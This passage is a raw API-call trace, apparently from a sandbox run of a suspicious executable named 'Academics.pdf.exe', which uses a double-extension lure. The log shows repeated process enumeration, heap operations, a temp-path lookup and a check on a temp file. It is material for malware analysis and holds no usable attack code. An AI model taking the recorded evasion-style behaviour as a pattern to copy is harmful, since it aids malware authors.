cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.613] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.614] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.615] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0318.616] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.617] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.618] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0318.618] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0318.619] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0318.620] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0318.621] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.621] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0318.622] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0318.623] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0318.624] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0318.624] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0318.625] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0318.626] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0318.627] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0318.627] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0318.628] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0318.629] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0318.630] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0318.631] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0318.631] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0318.632] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0318.633] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0318.634] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0318.634] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0318.635] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0318.636] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.637] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0318.638] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.638] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0318.639] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 0 [0318.640] CloseHandle (hObject=0x294) returned 1 [0318.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0318.640] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0318.640] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.641] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0318.642] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0318.643] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0318.644] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0318.645] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.645] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0318.646] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0318.647] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0318.648] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0318.649] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0318.649] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0318.650] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.651] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.652] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.652] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.653] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.654] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0318.655] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.655] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0318.656] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0318.657] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0318.668] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0318.668] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.669] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0318.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0318.669] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0318.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0318.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0318.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0318.670] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0318.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0318.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0318.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0318.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0318.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0318.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0318.671] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0318.671] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.671] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.671] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, 